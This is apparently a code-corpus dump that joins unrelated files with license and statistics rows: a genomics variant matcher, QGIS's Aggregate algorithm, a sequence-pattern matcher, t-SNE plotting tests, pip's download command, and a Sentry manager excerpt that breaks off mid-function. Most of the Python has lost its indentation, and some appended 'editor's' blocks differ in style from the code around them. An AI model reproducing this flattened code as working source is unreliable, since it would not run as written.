variant = '{0}:{1}:exon{2}:{3}'.format(gene, transcript, exon, hgvs)
for row in rows:
match = re.search('({0}:)?{1}:.*?:{2}'.format(gene, transcript, hgvs), gene_vcf[row])
if match:
rows_to_delete.append(row)
found = True
self.matches += 1
self.results[gene]['found'].add(variant)
break
"""
This section will allow matches to be made which are less specific.
This may not be useful if exon numbers are required, but exon numbers
may change between systems more easily than variant nomenclature.
Matching only on nomenclature should be fine for this project.
"""
if not found:
for row in rows:
if hgvs in gene_vcf[row]:
rows_to_delete.append(row)
found = True
self.matches += 1
self.results[gene]['found'].add(variant)
break
if not found:
self.results[gene]['not_found']['in_fq'].add(variant)
self.unmatched_predictions += 1
# Delete any rows which have been matched against
# This is done in reverse, high indexes first
# From low to high would mean the list shrinks and high indexes are invalid
for row in sorted(rows_to_delete, reverse=True):
del gene_vcf[row]
self.vcf[gene] = gene_vcf
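# --- Editor's illustration (hedged; not part of the original script) ---
# add_missing_variants() pulls HGVS strings out of ANNOVAR-style INFO fields with
# the regular expressions above. The sample INFO string below is invented purely
# to show the capture group; real annotations may differ.
if __name__ == '__main__':
    sample_info = 'GeneDetail.refGene=NM_002506:c.-6897A>G;AAChange.refGene=.;'
    hit = (re.search('GeneDetail.refGene=.*?:(?P<HGVS>NM_.*?);', sample_info) or
           re.search('GeneDetail.refGene=(?P<HGVS>NM_.*?);', sample_info))
    if hit:
        print hit.group('HGVS')  # NM_002506:c.-6897A>G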
| gpl-2.0 | -1,666,488,385,200,868,000 | 45.66055 | 118 | 0.5116 | false | 4.169992 | false | false | false |
telwertowski/QGIS | python/plugins/processing/algs/qgis/Aggregate.py | 15 | 11386 | # -*- coding: utf-8 -*-
"""
***************************************************************************
Aggregate.py
---------------------
Date : February 2017
Copyright : (C) 2017 by Arnaud Morvan
Email : arnaud dot morvan at camptocamp dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Arnaud Morvan'
__date__ = 'February 2017'
__copyright__ = '(C) 2017, Arnaud Morvan'
from qgis.core import (
QgsDistanceArea,
QgsExpression,
QgsExpressionContextUtils,
QgsFeature,
QgsFeatureSink,
QgsField,
QgsFields,
QgsGeometry,
QgsProcessing,
QgsProcessingParameterDefinition,
QgsProcessingParameterExpression,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterFeatureSource,
QgsProcessingException,
QgsProcessingUtils,
QgsWkbTypes,
)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class Aggregate(QgisAlgorithm):
INPUT = 'INPUT'
GROUP_BY = 'GROUP_BY'
AGGREGATES = 'AGGREGATES'
DISSOLVE = 'DISSOLVE'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Vector geometry')
def groupId(self):
return 'vectorgeometry'
def name(self):
return 'aggregate'
def displayName(self):
return self.tr('Aggregate')
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT,
self.tr('Input layer'),
types=[QgsProcessing.TypeVector]))
self.addParameter(QgsProcessingParameterExpression(self.GROUP_BY,
self.tr('Group by expression (NULL to group all features)'),
defaultValue='NULL',
optional=False,
parentLayerParameterName=self.INPUT))
class ParameterAggregates(QgsProcessingParameterDefinition):
def __init__(self, name, description, parentLayerParameterName='INPUT'):
super().__init__(name, description)
self._parentLayerParameter = parentLayerParameterName
def clone(self):
copy = ParameterAggregates(self.name(), self.description(), self._parentLayerParameter)
return copy
def type(self):
return 'aggregates'
def checkValueIsAcceptable(self, value, context=None):
if not isinstance(value, list):
return False
for field_def in value:
if not isinstance(field_def, dict):
return False
if not field_def.get('input', False):
return False
if not field_def.get('aggregate', False):
return False
if not field_def.get('name', False):
return False
if not field_def.get('type', False):
return False
return True
def valueAsPythonString(self, value, context):
return str(value)
def asScriptCode(self):
raise NotImplementedError()
@classmethod
def fromScriptCode(cls, name, description, isOptional, definition):
raise NotImplementedError()
def parentLayerParameter(self):
return self._parentLayerParameter
self.addParameter(ParameterAggregates(self.AGGREGATES,
description=self.tr('Aggregates')))
self.parameterDefinition(self.AGGREGATES).setMetadata({
'widget_wrapper': 'processing.algs.qgis.ui.AggregatesPanel.AggregatesWidgetWrapper'
})
self.addParameter(QgsProcessingParameterFeatureSink(self.OUTPUT,
self.tr('Aggregated')))
def parameterAsAggregates(self, parameters, name, context):
return parameters[name]
def prepareAlgorithm(self, parameters, context, feedback):
source = self.parameterAsSource(parameters, self.INPUT, context)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
group_by = self.parameterAsExpression(parameters, self.GROUP_BY, context)
aggregates = self.parameterAsAggregates(parameters, self.AGGREGATES, context)
da = QgsDistanceArea()
da.setSourceCrs(source.sourceCrs(), context.transformContext())
da.setEllipsoid(context.project().ellipsoid())
self.source = source
self.group_by = group_by
self.group_by_expr = self.createExpression(group_by, da, context)
self.geometry_expr = self.createExpression('collect($geometry, {})'.format(group_by), da, context)
self.fields = QgsFields()
self.fields_expr = []
for field_def in aggregates:
self.fields.append(QgsField(name=field_def['name'],
type=field_def['type'],
typeName="",
len=field_def['length'],
prec=field_def['precision']))
aggregate = field_def['aggregate']
if aggregate == 'first_value':
expression = field_def['input']
elif aggregate == 'concatenate' or aggregate == 'concatenate_unique':
expression = ('{}({}, {}, {}, \'{}\')'
.format(field_def['aggregate'],
field_def['input'],
group_by,
'TRUE',
field_def['delimiter']))
else:
expression = '{}({}, {})'.format(field_def['aggregate'],
field_def['input'],
group_by)
expr = self.createExpression(expression, da, context)
self.fields_expr.append(expr)
return True
def processAlgorithm(self, parameters, context, feedback):
expr_context = self.createExpressionContext(parameters, context, self.source)
self.group_by_expr.prepare(expr_context)
# Group features in memory layers
source = self.source
count = self.source.featureCount()
if count:
progress_step = 50.0 / count
current = 0
groups = {}
keys = [] # We need deterministic order for the tests
feature = QgsFeature()
for feature in self.source.getFeatures():
expr_context.setFeature(feature)
group_by_value = self.evaluateExpression(self.group_by_expr, expr_context)
# Get an hashable key for the dict
key = group_by_value
if isinstance(key, list):
key = tuple(key)
group = groups.get(key, None)
if group is None:
sink, id = QgsProcessingUtils.createFeatureSink(
'memory:',
context,
source.fields(),
source.wkbType(),
source.sourceCrs())
layer = QgsProcessingUtils.mapLayerFromString(id, context)
group = {
'sink': sink,
'layer': layer,
'feature': feature
}
groups[key] = group
keys.append(key)
group['sink'].addFeature(feature, QgsFeatureSink.FastInsert)
current += 1
feedback.setProgress(int(current * progress_step))
if feedback.isCanceled():
return
(sink, dest_id) = self.parameterAsSink(parameters,
self.OUTPUT,
context,
self.fields,
QgsWkbTypes.multiType(source.wkbType()),
source.sourceCrs())
if sink is None:
raise QgsProcessingException(self.invalidSinkError(parameters, self.OUTPUT))
# Calculate aggregates on memory layers
if len(keys):
progress_step = 50.0 / len(keys)
for current, key in enumerate(keys):
group = groups[key]
expr_context = self.createExpressionContext(parameters, context)
expr_context.appendScope(QgsExpressionContextUtils.layerScope(group['layer']))
expr_context.setFeature(group['feature'])
geometry = self.evaluateExpression(self.geometry_expr, expr_context)
if geometry is not None and not geometry.isEmpty():
geometry = QgsGeometry.unaryUnion(geometry.asGeometryCollection())
if geometry.isEmpty():
raise QgsProcessingException(
'Impossible to combine geometries for {} = {}'
.format(self.group_by, group_by_value))
attrs = []
for fields_expr in self.fields_expr:
attrs.append(self.evaluateExpression(fields_expr, expr_context))
# Write output feature
outFeat = QgsFeature()
if geometry is not None:
outFeat.setGeometry(geometry)
outFeat.setAttributes(attrs)
sink.addFeature(outFeat, QgsFeatureSink.FastInsert)
feedback.setProgress(50 + int(current * progress_step))
if feedback.isCanceled():
return
return {self.OUTPUT: dest_id}
def createExpression(self, text, da, context):
expr = QgsExpression(text)
expr.setGeomCalculator(da)
expr.setDistanceUnits(context.project().distanceUnits())
expr.setAreaUnits(context.project().areaUnits())
if expr.hasParserError():
raise QgsProcessingException(
self.tr(u'Parser error in expression "{}": {}')
.format(text, expr.parserErrorString()))
return expr
def evaluateExpression(self, expr, context):
value = expr.evaluate(context)
if expr.hasEvalError():
raise QgsProcessingException(
self.tr(u'Evaluation error in expression "{}": {}')
.format(expr.expression(), expr.evalErrorString()))
return value
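# --- Editor's note (hedged illustration; not part of the QGIS plugin) ---
# prepareAlgorithm() above turns each aggregate definition into a QGIS expression
# string such as sum("population", "region"). The guarded snippet below mirrors
# only that string building in plain Python so the result can be inspected; the
# field and group names are invented for the example.
if __name__ == '__main__':
    example_def = {'input': '"population"', 'aggregate': 'sum'}
    example_group_by = '"region"'
    print('{}({}, {})'.format(example_def['aggregate'],
                              example_def['input'],
                              example_group_by))
    # expected output: sum("population", "region")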
| gpl-2.0 | -4,547,797,799,809,260,000 | 39.810036 | 119 | 0.51739 | false | 5.298278 | false | false | false |
BIO-DIKU/SeqScan | ReferenceSRC/sfm_python.py | 1 | 6471 | #!/usr/bin/python
#####################################
class SequenceUnit:
"""
A pattern unit with a prespecified sequence and, possibly, an allowed number of
mismatches, insertions, and deletions.
"""
def __init__(self, seq, M, I, D):
self.sequence = seq
self.M = M
self.I = I
self.D = D
self.match_set = MatchSet()
def matches(self, seq, pos):
self.match_set.reset(pos)
loose_match(seq, pos, self.sequence, self.M, self.I, self.D, 0, self.match_set)
print self.match_set.end_positions
return len(self.match_set.end_positions) != 0
class RangeUnit:
"""
A pattern unit matching any character sequence with length within a certain range.
"""
def __init__(self, min_len, max_len):
self.min_len = min_len
self.max_len = max_len
self.match_set = MatchSet()
def matches(self, seq, pos):
self.match_set.reset(pos)
range_match(seq, pos, self.min_len, self.max_len, self.match_set)
return len(self.match_set.end_positions) != 0
class ReferenceUnit:
"""
A pattern unit that extracts previous matches from another "referenced" pattern unit and
attempts to match the sequence of these matches, allowing for a number of mismatches,
insertions and deletions.
"""
def __init__(self, ref_unit, M, I, D, reverse, complement):
self.ref_unit = ref_unit
self.M = M
self.I = I
self.D = D
self.reverse = reverse
self.complement = complement
self.match_set = MatchSet()
def matches(self, seq, pos):
self.match_set.reset(pos)
reference_match(seq, pos, self.ref_unit.match_set, self.M, self.I, self.D,self.reverse, self.complement, self.match_set)
return len(self.match_set.end_positions) != 0
class CompositeUnit:
"""
A pattern that is composed of other pattern units that must match consecutively for the
composite to pass
"""
def __init__(self, units):
self.units = units
self.match_set = MatchSet()
def rest_matches(self, seq, positions, pu_idx):
if pu_idx>=len(self.units):
return True
for pos in positions:
if self.units[pu_idx].matches(seq,pos) and self.rest_matches(seq,self.units[pu_idx].match_set.end_positions, pu_idx+1):
return True
return False
def matches(self, seq, pos):
return self.rest_matches(seq, [pos], 0)
#####################################
class MatchSet:
"""
Represents a set of matches using their common start position and the set of all possible
end-positions. The end-position is the index of the first character that comes after the
match, so e.g. the match starting at 2 with end-position 5 in the sequence "ATCCAG" will be
the sub-sequence "CCA".
"""
def __init__(self, pos=-1):
self.pos = pos
self.end_positions = set([])
def __str__(self):
return "Match["+str(self.pos)+","+str(self.end_positions)+"]"
def reset(self, new_pos):
self.pos = new_pos
self.end_positions.clear()
#####################################
from string import maketrans
complement_table = maketrans("ATUCG","TAAGC")
def nucl_complement(S):
return S.translate(complement_table)[::-1]
def nucl_reverse(S):
return S[::-1]
def reference_match(S,i, match_set, M, I, D, reverse, complement, ret=MatchSet()):
"""
Take the string of a previous match and match it to S, allowing for a number of mismatches,
insertions, and deletions.
S --- The string in which to search for matches
i --- The position in S from which to search
match_set --- The matches of the referenced pattern-unit
M --- The allowed number of mismatches
I --- The allowed number of insertions
D --- The allowed number of deletions
ret --- An accumulating set of matches
"""
if match_set is None: return None
ret.pos = i
for ep in match_set.end_positions:
P = S[match_set.pos:ep]
if reverse: P = nucl_reverse(P)
if complement: P = nucl_complement(P)
loose_match(S,i,P,M,I,D,0,ret)
if ret.end_positions:
return ret
else:
return None
def range_match(S,i, minLen, maxLen, ret=MatchSet(0)):
"""
Match a range to a string given the minimum and maximum length of the range.
S --- The string in which to search for matches
i --- The position in S from which to search
minLen --- The minimum length of the range
maxLen --- The maximum length of the range
ret --- An accumulating set of matches
"""
ret.pos = i
ret.end_positions.update( range(i+minLen, min(i+maxLen+1,len(S))) )
if ret.end_positions:
return ret
else:
return None
def loose_match(S,i,P,M,I,D,j=0, ret=MatchSet(None)):
"""
Match a pattern to a string given an allowed number of mismatches, insertions and deletions.
S --- The string in which to search for matches
i --- The position in S from which to search
P --- The pattern string
M --- The allowed number of mismatches
I --- The allowed number of insertions
D --- The allowed number of deletions
j --- The position in P from which to search
ret --- An accumulating set of matches
"""
if ret.pos is None: ret.pos = i
if j==len(P):
ret.end_positions.add(i)
return ret
if i==len(S):
return None
if I>0: loose_match(S,i+1,P,M, I-1,D, j, ret)
if D>0: loose_match(S,i ,P,M, I, D-1,j+1, ret)
if S[i]==P[j]:
loose_match(S,i+1,P,M,I,D,j+1,ret)
if M>0: loose_match(S,i+1,P,M-1,I, D, j+1, ret)
if not ret.end_positions:
return None
else:
return ret
def scan_for_matches(P, S):
for pos in range(0,len(S)):
if P.matches(S,pos):
print "Full pattern match at position",pos
#p1 = SequenceUnit("ATA",1,0,1)
#p2 = SequenceUnit("AAA",0,0,0)
#P = CompositeUnit([ p1,p2 ])
#S = "AATAAAGAA"
#p1 = SequenceUnit("ATA",0,0,0)
#p2 = RangeUnit(2,5)
#p3 = ReferenceUnit(p1,1,0,0, False, False)
#P = CompositeUnit([ p1,p2,p3 ]) # Corresponds to the SFM pattern "p1=AAG[1,0,0] 2..5 p1"
#S = "AATAAAAGAA"
#p1 = RangeUnit(4,10)
#p2 = RangeUnit(4,4)
#p3 = ReferenceUnit(p1,0,0,0, True, True)
#P = CompositeUnit([p1,p2,p3]) # "p1=4...10 4...4 ~p1"
# scan_for_matches(P, S)
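# --- Editor's addition: the first commented-out example above, made executable ---
# The pattern "p1=ATA[1,0,1] AAA[0,0,0]" is scanned over a short toy sequence;
# with one mismatch and one deletion allowed on the first unit, at least one full
# pattern match should be reported.
p1 = SequenceUnit("ATA", 1, 0, 1)
p2 = SequenceUnit("AAA", 0, 0, 0)
P = CompositeUnit([p1, p2])
scan_for_matches(P, "AATAAAGAA")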
| gpl-2.0 | -5,171,004,589,815,847,000 | 28.958333 | 131 | 0.603462 | false | 3.309974 | false | false | false |
SSGL-SEP/t-sne_cruncher | test/subprocesses/test_subprocess_output.py | 1 | 2385 | from unittest import TestCase, mock
import os
import numpy
from subprocesses.dimensionality_reduction import _get_colors, plot_results
class TestColorMapping(TestCase):
def setUp(self):
self.manhattan = [6, 11, -1, 21, 14]
self.arr = numpy.asarray([[1, 2, 3], [2, 5, 4], [3, 4, -8], [4, 11, 6], [5, 9]])
self.metadata = {"test_tag": {"__filterable": True,
"v1":
{"points": [0, 2, 3],
"color": "#ffffff"},
"v2":
{"points": [1, 4],
"color": "#ff0000"},
}}
def test_color_by_manhattan(self):
res = _get_colors(self.arr)
self.assertSequenceEqual(res, self.manhattan)
def test_color_by_metadata(self):
res = _get_colors(self.arr, self.metadata, "test_tag")
self.assertSequenceEqual(res, [(1.0, 1.0, 1.0),
(1.0, 0.0, 0.0),
(1.0, 1.0, 1.0),
(1.0, 1.0, 1.0),
(1.0, 0.0, 0.0)])
def test_color_missing_metadata(self):
res = _get_colors(self.arr, None, "test_tag")
self.assertSequenceEqual(res, self.manhattan)
def test_color_missing_colorby(self):
res = _get_colors(self.arr, self.metadata)
self.assertSequenceEqual(res, self.manhattan)
class TestPlotOutput(TestCase):
def setUp(self):
self.arr = numpy.asarray([[1, 2, 3], [2, 5, 4], [3, 4, -8], [4, 11, 6], [5, 9]])
@mock.patch("subprocesses.dimensionality_reduction.plt")
def test_plot_results(self, mock_plot):
plot_results(self.arr)
mock_plot.figure.assert_called_with(figsize=(16, 16))
unnamed, named = mock_plot.scatter.call_args
self.assertSequenceEqual(unnamed[0], [1, 2, 3, 4, 5])
self.assertSequenceEqual(unnamed[1], [2, 5, 4, 11, 9])
self.assertSequenceEqual(named["c"], [6, 11, -1, 21, 14])
self.assertEqual(named["s"], 20)
mock_plot.tight_layout.assert_called()
mock_plot.savefig.assert_called_with(os.path.join(os.getcwd(), "prints.png"))
mock_plot.close.assert_called()
| mit | 3,842,694,288,443,195,000 | 39.423729 | 88 | 0.495597 | false | 3.581081 | true | false | false |
xavfernandez/pip | src/pip/_internal/commands/download.py | 7 | 5007 | # The following comment should be removed at some point in the future.
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import logging
import os
from pip._internal.cli import cmdoptions
from pip._internal.cli.cmdoptions import make_target_python
from pip._internal.cli.req_command import RequirementCommand
from pip._internal.req import RequirementSet
from pip._internal.req.req_tracker import get_requirement_tracker
from pip._internal.utils.misc import ensure_dir, normalize_path, write_output
from pip._internal.utils.temp_dir import TempDirectory
logger = logging.getLogger(__name__)
class DownloadCommand(RequirementCommand):
"""
Download packages from:
- PyPI (and other indexes) using requirement specifiers.
- VCS project urls.
- Local project directories.
- Local or remote source archives.
pip also supports downloading from "requirements files", which provide
an easy way to specify a whole environment to be downloaded.
"""
usage = """
%prog [options] <requirement specifier> [package-index-options] ...
%prog [options] -r <requirements file> [package-index-options] ...
%prog [options] <vcs project url> ...
%prog [options] <local project path> ...
%prog [options] <archive url/path> ..."""
def __init__(self, *args, **kw):
super(DownloadCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.global_options())
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(cmdoptions.prefer_binary())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(cmdoptions.pre())
cmd_opts.add_option(cmdoptions.no_clean())
cmd_opts.add_option(cmdoptions.require_hashes())
cmd_opts.add_option(cmdoptions.progress_bar())
cmd_opts.add_option(cmdoptions.no_build_isolation())
cmd_opts.add_option(cmdoptions.use_pep517())
cmd_opts.add_option(cmdoptions.no_use_pep517())
cmd_opts.add_option(
'-d', '--dest', '--destination-dir', '--destination-directory',
dest='download_dir',
metavar='dir',
default=os.curdir,
help=("Download packages into <dir>."),
)
cmdoptions.add_target_python_options(cmd_opts)
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def run(self, options, args):
options.ignore_installed = True
# editable doesn't really make sense for `pip download`, but the bowels
# of the RequirementSet code require that property.
options.editables = []
cmdoptions.check_dist_restriction(options)
options.download_dir = normalize_path(options.download_dir)
ensure_dir(options.download_dir)
session = self.get_default_session(options)
target_python = make_target_python(options)
finder = self._build_package_finder(
options=options,
session=session,
target_python=target_python,
)
build_delete = (not (options.no_clean or options.build_dir))
with get_requirement_tracker() as req_tracker, TempDirectory(
options.build_dir, delete=build_delete, kind="download"
) as directory:
requirement_set = RequirementSet()
self.populate_requirement_set(
requirement_set,
args,
options,
finder,
session,
None
)
preparer = self.make_requirement_preparer(
temp_build_dir=directory,
options=options,
req_tracker=req_tracker,
session=session,
finder=finder,
download_dir=options.download_dir,
use_user_site=False,
)
resolver = self.make_resolver(
preparer=preparer,
finder=finder,
options=options,
py_version_info=options.python_version,
)
self.trace_basic_info(finder)
resolver.resolve(requirement_set)
downloaded = ' '.join([
req.name for req in requirement_set.successfully_downloaded
])
if downloaded:
write_output('Successfully downloaded %s', downloaded)
# Clean up
if not options.no_clean:
requirement_set.cleanup_files()
return requirement_set
| mit | -5,579,505,478,624,617,000 | 33.061224 | 79 | 0.611544 | false | 4.225316 | false | false | false |
rdio/sentry | src/sentry/manager.py | 1 | 34892 | """
sentry.manager
~~~~~~~~~~~~~~
:copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import datetime
import hashlib
import logging
import time
import warnings
import uuid
from celery.signals import task_postrun
from django.conf import settings
from django.contrib.auth.models import UserManager
from django.core.signals import request_finished
from django.db import models, transaction, IntegrityError
from django.db.models import Sum
from django.utils import timezone
from django.utils.datastructures import SortedDict
from raven.utils.encoding import to_string
from sentry import app
from sentry.constants import (
STATUS_RESOLVED, STATUS_UNRESOLVED, MINUTE_NORMALIZATION,
LOG_LEVELS, DEFAULT_LOGGER_NAME, MAX_CULPRIT_LENGTH)
from sentry.db.models import BaseManager
from sentry.processors.base import send_group_processors
from sentry.signals import regression_signal
from sentry.tasks.index import index_event
from sentry.utils.cache import cache, memoize
from sentry.utils.dates import get_sql_date_trunc, normalize_datetime
from sentry.utils.db import get_db_engine, has_charts, attach_foreignkey
from sentry.utils.safe import safe_execute, trim, trim_dict, trim_frames
from sentry.utils.strings import strip
logger = logging.getLogger('sentry.errors')
UNSAVED = dict()
MAX_TAG_LENGTH = 200
def get_checksum_from_event(event):
interfaces = event.interfaces
for interface in interfaces.itervalues():
result = interface.get_composite_hash(interfaces=event.interfaces)
if result:
hash = hashlib.md5()
for r in result:
hash.update(to_string(r))
return hash.hexdigest()
return hashlib.md5(to_string(event.message)).hexdigest()
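# Illustrative sketch (not Sentry's own docs): the checksum is what collapses
# repeated events into a single Group. Each interface may contribute a
# composite hash (e.g. exception type plus culprit frames); when none does,
# the raw message is hashed instead, roughly:
#
#   >>> import hashlib
#   >>> hashlib.md5(to_string('Connection refused')).hexdigest()
#   # -> 32-character hex digest later stored as Group.checksum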
class ScoreClause(object):
def __init__(self, group):
self.group = group
def prepare_database_save(self, unused):
return self
def prepare(self, evaluator, query, allow_joins):
return
def evaluate(self, node, qn, connection):
engine = get_db_engine(getattr(connection, 'alias', 'default'))
if engine.startswith('postgresql'):
sql = 'log(times_seen) * 600 + last_seen::abstime::int'
elif engine.startswith('mysql'):
sql = 'log(times_seen) * 600 + unix_timestamp(last_seen)'
else:
            # XXX: if we can't do it atomically let's do it the best we can
sql = self.group.get_score()
return (sql, [])
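# Worked example (illustrative): for a group with times_seen=1000 and a
# last_seen epoch of 1,300,000,000 the postgres expression above evaluates to
# log(1000) * 600 + 1,300,000,000 = 1,800 + 1,300,000,000 (postgres log() is
# base 10), so recency dominates the score while the log term breaks ties in
# favor of frequently seen groups.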
def count_limit(count):
# TODO: could we do something like num_to_store = max(math.sqrt(100*count)+59, 200) ?
# ~ 150 * ((log(n) - 1.5) ^ 2 - 0.25)
for amount, sample_rate in settings.SENTRY_SAMPLE_RATES:
if count <= amount:
return sample_rate
return settings.SENTRY_MAX_SAMPLE_RATE
def time_limit(silence): # ~ 3600 per hour
for amount, sample_rate in settings.SENTRY_SAMPLE_TIMES:
if silence >= amount:
return sample_rate
return settings.SENTRY_MAX_SAMPLE_TIME
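# Illustrative sketch of the sampling thresholds (the tuples below are
# hypothetical; the real ones come from settings.SENTRY_SAMPLE_RATES and
# settings.SENTRY_SAMPLE_TIMES):
#
#   SENTRY_SAMPLE_RATES = ((50, 1), (1000, 2), (10000, 10))
#   # count_limit(30)    -> 1
#   # count_limit(500)   -> 2
#   # count_limit(50000) -> SENTRY_MAX_SAMPLE_RATE
#
# GroupManager.should_sample() below combines count_limit and time_limit via
# modulo checks on times_seen to decide whether the raw event is persisted or
# only counted.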
class UserManager(BaseManager, UserManager):
pass
class ChartMixin(object):
def get_chart_data_for_group(self, instances, max_days=90, key=None):
if not instances:
if key is None:
return []
return {}
if hasattr(instances[0], '_state'):
db = instances[0]._state.db or 'default'
else:
db = 'default'
field = self.model.groupcountbyminute_set.related
column = field.field.name
queryset = field.model.objects.filter(**{
'%s__in' % column: instances,
})
return self._get_chart_data(queryset, max_days, db, key=key)
def get_chart_data(self, instance, max_days=90, key=None):
if hasattr(instance, '_state'):
db = instance._state.db or 'default'
else:
db = 'default'
queryset = instance.groupcountbyminute_set
return self._get_chart_data(queryset, max_days, db, key=key)
def _get_chart_data(self, queryset, max_days=90, db='default', key=None):
if not has_charts(db):
if key is None:
return []
return {}
today = timezone.now().replace(microsecond=0, second=0)
# the last interval is not accurate, so we exclude it
# TODO: it'd be ideal to normalize the last datapoint so that we can include it
# and not have ~inaccurate data for up to MINUTE_NORMALIZATION
today -= datetime.timedelta(minutes=MINUTE_NORMALIZATION)
if max_days >= 30:
g_type = 'date'
d_type = 'days'
points = max_days
modifier = 1
today = today.replace(hour=0)
elif max_days >= 1:
g_type = 'hour'
d_type = 'hours'
points = max_days * 24
modifier = 1
today = today.replace(minute=0)
else:
g_type = 'minute'
d_type = 'minutes'
modifier = MINUTE_NORMALIZATION
points = max_days * 24 * (60 / modifier)
min_date = today - datetime.timedelta(days=max_days)
method = get_sql_date_trunc('date', db, grouper=g_type)
chart_qs = queryset.filter(
date__gte=min_date,
).extra(
select={'grouper': method},
)
if key:
chart_qs = chart_qs.values('grouper', key)
else:
chart_qs = chart_qs.values('grouper')
chart_qs = chart_qs.annotate(
num=Sum('times_seen'),
)
if key:
chart_qs = chart_qs.values_list(key, 'grouper', 'num').order_by(key, 'grouper')
else:
chart_qs = chart_qs.values_list('grouper', 'num').order_by('grouper')
if key is None:
rows = {None: dict(chart_qs)}
else:
rows = {}
for item, grouper, num in chart_qs:
if item not in rows:
rows[item] = {}
rows[item][grouper] = num
results = {}
for item, tsdata in rows.iteritems():
results[item] = []
for point in xrange(points, -1, -1):
dt = today - datetime.timedelta(**{d_type: point * modifier})
results[item].append((int(time.mktime((dt).timetuple())) * 1000, tsdata.get(dt, 0)))
if key is None:
return results[None]
return results
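    # Illustrative sketch of the return shape: without `key` the result is a
    # flat series of (epoch_millis, count) pairs, e.g.
    #   [(1370000000000, 3), (1370003600000, 0), ...]
    # and with `key` it is a dict mapping each key value to such a series.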
class GroupManager(BaseManager, ChartMixin):
use_for_related_fields = True
def normalize_event_data(self, data):
# TODO(dcramer): store http.env.REMOTE_ADDR as user.ip
# First we pull out our top-level (non-data attr) kwargs
if not data.get('level') or data['level'] not in LOG_LEVELS:
data['level'] = logging.ERROR
if not data.get('logger'):
data['logger'] = DEFAULT_LOGGER_NAME
else:
data['logger'] = trim(data['logger'], 64)
timestamp = data.get('timestamp')
if not timestamp:
timestamp = timezone.now()
# We must convert date to local time so Django doesn't mess it up
# based on TIME_ZONE
if settings.TIME_ZONE:
if not timezone.is_aware(timestamp):
timestamp = timestamp.replace(tzinfo=timezone.utc)
elif timezone.is_aware(timestamp):
timestamp = timestamp.replace(tzinfo=None)
data['timestamp'] = timestamp
if not data.get('event_id'):
data['event_id'] = uuid.uuid4().hex
data.setdefault('message', None)
data.setdefault('culprit', None)
data.setdefault('time_spent', None)
data.setdefault('server_name', None)
data.setdefault('site', None)
data.setdefault('checksum', None)
data.setdefault('platform', None)
data.setdefault('extra', {})
tags = data.get('tags')
if not tags:
tags = []
# full support for dict syntax
elif isinstance(tags, dict):
tags = tags.items()
# prevent [tag, tag, tag] (invalid) syntax
elif not all(len(t) == 2 for t in tags):
tags = []
else:
tags = list(tags)
data['tags'] = tags
data['message'] = strip(data['message'])
data['culprit'] = strip(data['culprit'])
if not isinstance(data['extra'], dict):
# throw it away
data['extra'] = {}
trim_dict(
data['extra'], max_size=settings.SENTRY_MAX_EXTRA_VARIABLE_SIZE)
if 'sentry.interfaces.Exception' in data:
if 'values' not in data['sentry.interfaces.Exception']:
data['sentry.interfaces.Exception'] = {
'values': [data['sentry.interfaces.Exception']]
}
# convert stacktrace + exception into expanded exception
if 'sentry.interfaces.Stacktrace' in data:
data['sentry.interfaces.Exception']['values'][0]['stacktrace'] = data.pop('sentry.interfaces.Stacktrace')
for exc_data in data['sentry.interfaces.Exception']['values']:
for key in ('type', 'module', 'value'):
value = exc_data.get(key)
if value:
exc_data[key] = trim(value)
if exc_data.get('stacktrace'):
trim_frames(exc_data['stacktrace'])
for frame in exc_data['stacktrace']['frames']:
stack_vars = frame.get('vars', {})
trim_dict(stack_vars)
if 'sentry.interfaces.Stacktrace' in data:
trim_frames(data['sentry.interfaces.Stacktrace'])
for frame in data['sentry.interfaces.Stacktrace']['frames']:
stack_vars = frame.get('vars', {})
trim_dict(stack_vars)
if 'sentry.interfaces.Message' in data:
msg_data = data['sentry.interfaces.Message']
            msg_data['message'] = trim(msg_data['message'], 1024)
if msg_data.get('params'):
msg_data['params'] = trim(msg_data['params'])
if 'sentry.interfaces.Http' in data:
http_data = data['sentry.interfaces.Http']
for key in ('cookies', 'querystring', 'headers', 'env', 'url'):
value = http_data.get(key)
if not value:
continue
if type(value) == dict:
trim_dict(value)
else:
http_data[key] = trim(value)
value = http_data.get('data')
if value:
http_data['data'] = trim(value, 2048)
# default the culprit to the url
if not data['culprit']:
data['culprit'] = trim(strip(http_data.get('url')), MAX_CULPRIT_LENGTH)
return data
def from_kwargs(self, project, **kwargs):
data = self.normalize_event_data(kwargs)
return self.save_data(project, data)
def save_data(self, project, data, raw=False):
# TODO: this function is way too damn long and needs refactored
# the inner imports also suck so let's try to move it away from
# the objects manager
# TODO: culprit should default to "most recent" frame in stacktraces when
# it's not provided.
from sentry.plugins import plugins
from sentry.models import Event, Project, EventMapping
with transaction.commit_on_success():
project = Project.objects.get_from_cache(id=project)
# First we pull out our top-level (non-data attr) kwargs
event_id = data.pop('event_id')
message = data.pop('message')
culprit = data.pop('culprit')
level = data.pop('level')
time_spent = data.pop('time_spent')
logger_name = data.pop('logger')
server_name = data.pop('server_name')
site = data.pop('site')
date = data.pop('timestamp')
checksum = data.pop('checksum')
platform = data.pop('platform')
if 'sentry.interfaces.Exception' in data:
if 'values' not in data['sentry.interfaces.Exception']:
data['sentry.interfaces.Exception'] = {'values': [data['sentry.interfaces.Exception']]}
# convert stacktrace + exception into expanded exception
